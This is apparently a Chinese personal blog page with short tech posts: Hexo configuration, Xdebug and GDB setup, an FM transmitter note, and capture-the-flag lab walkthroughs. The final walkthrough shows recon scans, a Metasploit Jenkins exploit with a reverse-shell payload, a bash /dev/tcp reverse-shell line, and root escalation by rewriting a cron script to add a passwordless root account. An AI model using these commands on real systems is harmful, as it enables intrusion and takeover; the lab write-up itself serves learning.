HexBlog

0%

发表于 更新于 分类于 
1
2
3
4
5
6
wget -r -p -np -k http://www.xxx.com/.git/
--recursive(递归)
-k,  --convert-links(转换链接)
-p,  --page-requisites(页面必需元素)
-np, --no-parent(不追溯至父级)

发表于 更新于 分类于

本地搜索

插件安装

在hexo根目录安装

1
npm install hexo-generator-searchdb --save
> 我安装完插件后,hexo就被卸载了,还要使用yarn upgrade重新安装一遍hexo,你也可以使用yarn add hexo-generator-searchdb命令安装插件

修改根目录下的_config.yml

1
2
3
4
5
search:
    path: search.xml
    field: post
    format: html
    limit: 10000
编辑主题配置文件,我是用的next主题
1
2
local_search:
    enable: true
#### 出现的异常 当我点击搜索按钮时,会发生页面无限加载,问题是我的一篇文章中出现了非utf-8的文字,所以造成了xml报错,无法被读取.根据根目录下的search.xml出错信息,找到原文章删除特殊字符即可.

引用标签

1
2
3
{% asset_path slug %} #路径引用
{% asset_img slug [title] %} #图片引用
{% asset_link slug [title] %} #文件引用,用作下载链接

latex支持

卸载原有渲染器,安装hexo-renderer-kramed

1
2
yarn remove hexo-renderer-marked
yarn add hexo-renderer-kramed

修改next配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Math Equations Render Support
math:
  enable: true

  # Default (true) will load mathjax / katex script on demand.
  # That is it only render those page which has `mathjax: true` in Front Matter.
  # If you set it to false, it will load mathjax / katex srcipt EVERY PAGE.
  per_page: true

  engine: mathjax
  #engine: katex

  # hexo-rendering-pandoc (or hexo-renderer-kramed) needed to full MathJax support.
  mathjax:
    cdn: https://cdn.bootcss.com/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML #问号后面的是引用配置
    #cdn: //cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML

修改解析错误

这里的解析错误代表单行引用时要加四个反斜线才能正常换行

更换pandoc解码器

1
2
yarn remove hexo-renderer-marked
yarn add hexo-renderer-pandoc

发表于 更新于 分类于

原理:

三极管与线圈和可变电容器构成了一个振荡电路,振荡电路的作用呢就是可以输出高频电流,这个高频电流的频率能够随声音变化而变化。振荡的中心频率由线圈跟可变电容数值来决定。电源和电阻给三极管和驻极体话筒供电。当话筒输出的音频电压加到三极管的发射极时发射极电流发生变化,振荡频率会随音频信号变化,从而达到调频的目的。调频后的高频电流经电容器C2通过天线发射出去。

私制无线电信号设备违法,请申请批准

发表于 更新于 分类于

首先在用户配置json配置这个,用于显示默认配置

1
"workbench.settings.useSplitJSON": true,
### 源形式

安装对应版本的php(版本号)-dev,可以使用phpize命令

1
apt install php版本号-dev

检查你是否使用fpm启动php,如果是fpm,请添加语句到fpm目录下的php.ini

1
2
3
[XDebug]
xdebug.remote_enable = 1
xdebug.remote_autostart = 1

### 源码形式

下载xdebug源码包,解压进入目录,运行phpize生成configure

1
2
3
4
phpize
./configure
make
make intall
得到.so路径,添加上述允许远程调试的指令,并添加引用目录
1
zend_extension = php_xdebug.so

当你可以在phpinfo页面看到xdebug以及 xdebug.remote_enable 与 xdebug.remote_autostart 为on时则说明开启成功

发表于 更新于 分类于

背景知识

内存

与栈情况类似,但存储的是文件之类的数据

GDB基本调试命令

GDB基本调试命令 如何使用 GDB

GDB工具使用前期配置

设置对core文件输出大小无限制

1
2
3
4
5
6
7
8
9
10
su root

vi /etc/profile
Shift + G
i
# No core files by default 0, unlimited is oo
ulimit -S -c unlimited > /dev/null 2>&1
wq!

source /etc/profile

提示

在图形界面的虚拟终端下,可能需要每次启动都source一遍/etc/profile,请把source加入你的~/.bashrc~/.zshrc第一行

设置croe信息转储

core文件同名会覆盖. 这里为其加上一个 core命名规则, 让其变成 [core.pid] 格式.

1
2
3
4
5
6
7
8
9
10
11
12
13
su root

vi /etc/sysctl.conf
Shift + G
i

# open, add core.pid 
kernel.core_pattern = ./core_%t_%p_%e
kernel.core_uses_pid = 1

wq!

sysctl -p /etc/sysctl.conf

配置peda

1
2
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

GDB使用

常见用法

  1. 调试程序。有几种方法可以在gdb下运行你的程序:
  • gdb ${你的程序} 进入gdb后,输入run(简写r) ${arg1} ${arg2} … ${argN}
  • gdb --args ${你的程序} ${arg1} ${arg2} … ${argN} 进入gdb后,运行run。
  • gdb进入gdb后,输入file ${你的程序}。然后使用set args ${arg1} ${arg2} … ${argN} 设定好你的程序参数,再运行run。
  1. 调试正在运行的程序:
  • gdb ${你的程序} ${程序pid}
  1. 查core:
  • gdb ${你的程序} -core ${core文件}

静默模式启动gdb

gdb -q

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
gdb:b (break) #设置断点

b func_name #对函数下断点

b *addr   #对地址下断点

info b   # 查看断点


delete
用法:delete [breakpoints num] [range...]
delete可删除单个断点,也可删除一个断点的集合,这个集合用连续的断点号来描述。
例如:
delete 5
delete 1-10

clear
用法:clear 
    删除所在行的多有断点。
    clear location
clear 删除所选定的环境中所有的断点
clear location location描述具体的断点。
例如:
clear list_insert         //删除函数的所有断点
clear list.c:list_delet   //删除文件:函数的所有断点
clear 12                  //删除行号的所有断点
clear list.c:12           //删除文件:行号的所有断点

clear 删除断点是基于行的,不是把所有的断点都删除。

r #启动加载的程序

gdb:disas main #查看函数汇编指令

info r(egister) #查看寄存器情况

ni #单步调试

si #step into 步进 进到某个函数里面

bt  #backtrace 查看现在的堆栈情况   对于了解程序执行比较有用

c  #continue #继续执行到下一个断点

x /100xg $rsp  #以八进制查看从栈顶开始的100字节

pattern 工具

1
2
3
4
pattern 指令,生成长字符串,

pattern create 150 #生成一个长度为150字节的字符串
pattern offset rip地址 #判断从多少字节开始溢出,前提是程序非正常退出,rip内容被覆盖

参考资料

http://yaov.net/2018/09/15/linux-pwn%E5%9F%BA%E7%A1%801/

发表于 更新于 分类于

靶场八

看网页源代码,得到flag1flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

解码得到CIA – Operation Treadstone cwel 爬取字典https://bourne.fandom.com/wiki/Operation_Treadstone

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# root @ Divint3 in /home/divint3 [21:12:08] C:130
$ dirb http://172.17.135.8/ -S 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri May 31 21:12:11 2019
URL_BASE: http://172.17.135.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Silent Mode

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.17.135.8/ ----
==> DIRECTORY: http://172.17.135.8/admin/
==> DIRECTORY: http://172.17.135.8/css/
==> DIRECTORY: http://172.17.135.8/db/
==> DIRECTORY: http://172.17.135.8/dist/
+ http://172.17.135.8/index.php (CODE:200|SIZE:2433)
+ http://172.17.135.8/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://172.17.135.8/squirrelmail/
==> DIRECTORY: http://172.17.135.8/supplier/
==> DIRECTORY: http://172.17.135.8/upload/
==> DIRECTORY: http://172.17.135.8/user/
==> DIRECTORY: http://172.17.135.8/vendor/

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# root @ Divint3 in /home/divint3 [21:49:01] 
$ nmap 172.17.135.8 -Pn -sS                        

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-31 22:00 CST
Nmap scan report for 172.17.135.8
Host is up (0.0021s latency).
Not shown: 993 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
143/tcp open  imap
993/tcp open  imaps
995/tcp open  pop3s

Nmap done: 1 IP address (1 host up) scanned in 20.90 seconds

# root @ Divint3 in /home/divint3 [21:14:25] C:130
$ nmap 172.17.135.8 -A -O -sS

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-31 21:14 CST
Nmap scan report for 172.17.135.8
Host is up (0.0020s latency).
Not shown: 993 filtered ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 3.0.2
22/tcp  open  ssh      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 a9:98:84:aa:90:7e:f1:e6:be:c0:84:3e:fa:aa:83:8a (DSA)
|   2048 07:5c:77:15:30:5a:17:95:8e:0f:91:f0:2d:0b:c3:7a (RSA)
|_  256 2f:9c:29:b5:f5:dc:f4:95:07:6d:41:ee:f9:0d:15:b8 (ECDSA)
80/tcp  open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BlackMarket Weapon Management System
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL STLS PIPELINING RESP-CODES UIDL CAPA TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2017-11-01T07:05:35
|_Not valid after:  2027-11-01T07:05:35
|_ssl-date: TLS randomness does not represent time
143/tcp open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: listed OK IDLE more ID ENABLE LOGIN-REFERRALS LITERAL+ STARTTLS post-login capabilities SASL-IR Pre-login LOGINDISABLEDA0001 have IMAP4rev1
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2017-11-01T07:05:35
|_Not valid after:  2027-11-01T07:05:35
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: listed OK IDLE IMAP4rev1 AUTH=PLAINA0001 LOGIN-REFERRALS LITERAL+ post-login more ID SASL-IR capabilities Pre-login have ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2017-11-01T07:05:35
|_Not valid after:  2027-11-01T07:05:35
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL(PLAIN) USER PIPELINING RESP-CODES UIDL CAPA TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2017-11-01T07:05:35
|_Not valid after:  2027-11-01T07:05:35
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2, Linux 3.16 - 4.6, Linux 3.2 - 4.6, Linux 4.4
Network Distance: 3 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   ...
2   5.15 ms bogon (192.168.230.30)
3   3.27 ms 172.17.135.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.36 seconds

配置漏洞扫描器

1
2
3
4
5
6
7
cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
git clone https://github.com/scipag/vulscan.git
cd vulscan/utilities/updater/
chmod +x updateFiles.sh
./updateFiles.sh

1
nmap --script vulscan  -sV 172.17.135.8

发表于 更新于 分类于

NMAP扫描报告

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# root @ Divint3 in /home/divint3/web/blog [19:55:54] C:130
$ nmap 172.17.135.54 -O -sS -A -Pn

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-29 19:55 CST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 19:56 (0:00:00 remaining)
Nmap scan report for 172.17.135.54
Host is up (0.0026s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|_  256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 3 hops

TRACEROUTE (using port 256/tcp)
HOP RTT     ADDRESS
1   ...
2   4.76 ms bogon (192.168.230.30)
3   1.59 ms 172.17.135.54

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.08 seconds

可以看出 使用的是Jetty,在8080端口http://172.17.135.54:8080

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# root @ Divint3 in /home/divint3/web/blog [20:15:48] 
$ dirb http://172.17.135.54:8080 > /home/divint3/ctf_chache/list.txt 

# root @ Divint3 in /home/divint3/web/blog [20:07:57] 
$ sed '/^==>.*/!d' /home/divint3/ctf_chache/list.txt
==> DIRECTORY: http://172.17.135.54:8080/assets/               
==> DIRECTORY: http://172.17.135.54:8080/git/                  
==> DIRECTORY: http://172.17.135.54:8080/assets/class/         
==> DIRECTORY: http://172.17.135.54:8080/git/class/            
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/   
==> DIRECTORY: http://172.17.135.54:8080/assets/class/classes/ 
==> DIRECTORY: http://172.17.135.54:8080/assets/class/fields/  
==> DIRECTORY: http://172.17.135.54:8080/assets/class/name/    
==> DIRECTORY: http://172.17.135.54:8080/assets/class/package/ 
==> DIRECTORY: http://172.17.135.54:8080/git/class/class/      
==> DIRECTORY: http://172.17.135.54:8080/git/class/classes/    
==> DIRECTORY: http://172.17.135.54:8080/git/class/fields/     
==> DIRECTORY: http://172.17.135.54:8080/git/class/name/       
==> DIRECTORY: http://172.17.135.54:8080/git/class/package/    
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/class/ 
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/classes/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/fields/

# root @ Divint3 in /home/divint3/web/blog [20:15:41] C:1
$ sed -e '/^+.*/!d' /home/divint3/ctf_chache/list.txt 
+ http://172.17.135.54:8080/error (CODE:400|SIZE:5329)
+ http://172.17.135.54:8080/favicon.ico (CODE:200|SIZE:17542)
+ http://172.17.135.54:8080/login (CODE:200|SIZE:5988)
+ http://172.17.135.54:8080/logout (CODE:302|SIZE:0
+ http://172.17.135.54:8080/robots.txt (CODE:200|SIZE:71
+ http://172.17.135.54:8080/assets/dynamic (CODE:500|SIZE:13989)

dirb发现robots.txt

1
2
3
# we don't want robots to click "build" links
User-agent: *
Disallow: /

先测试一下脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf5 exploit(multi/http/jenkins_script_console) > search jenkins

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   1   auxiliary/gather/jenkins_cred_recovery                                 normal     Yes    Jenkins Domain Credential Recovery
   2   auxiliary/scanner/http/jenkins_command                                 normal     Yes    Jenkins-CI Unauthenticated Script-Console Scanner
   3   auxiliary/scanner/http/jenkins_enum                                    normal     Yes    Jenkins-CI Enumeration
   4   auxiliary/scanner/http/jenkins_login                                   normal     Yes    Jenkins-CI Login Utility
   5   auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum                   normal     No     Jenkins Server Broadcast Enumeration
   6   exploit/linux/misc/jenkins_java_deserialize           2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
   7   exploit/linux/misc/jenkins_ldap_deserialize           2016-11-16       excellent  Yes    Jenkins CLI HTTP Java Deserialization Vulnerability
   8   exploit/linux/misc/opennms_java_serialize             2015-11-06       normal     No     OpenNMS Java Object Unserialization Remote Code Execution
   9   exploit/multi/http/jenkins_metaprogramming            2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
   10  exploit/multi/http/jenkins_script_console             2013-01-18       good       Yes    Jenkins-CI Script-Console Java Execution
   11  exploit/multi/http/jenkins_xstream_deserialize        2016-02-24       excellent  Yes    Jenkins XStream Groovy classpath Deserialization Vulnerability
   12  exploit/windows/misc/ibm_websphere_java_deserialize   2015-11-06       excellent  No     IBM WebSphere RCE Java Deserialization Vulnerability
   13  post/multi/gather/jenkins_gather                                       normal     No     Jenkins Credential Collector

使用exploit/multi/http/jenkins_metaprogramming

1
2
3
4
5
6
7
set rhost 172.17.135.59 
set rport 8080
set payload java/meterpreter/reverse_tcp
set lhost 172.17.135.80
set lport 4442
set ForceExploit true
run

反弹shell至本地

1
2
3
4
5
6
7
8
9
bash -i >& /dev/tcp/172.17.135.80/4442 0>&1


返回
# root @ Divint3 in /home/divint3 [18:58:07] C:1
$ nc -lvp 4442
listening on [any] 4442 ...
connect to [172.17.135.80] from bogon [172.17.135.59] 55308

尝试suid文件提权, 没有特定文件

发现crontab

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1

修改目标脚本

1
echo "sed -i '/^root.*/a divint3::0:0:root:/root:/bin/bash'" > /etc/script/CleaningScript.sh

等待一会

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

su divint3
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"
[root@jarbas /]# cd /root
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 



[root@jarbas ~]# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false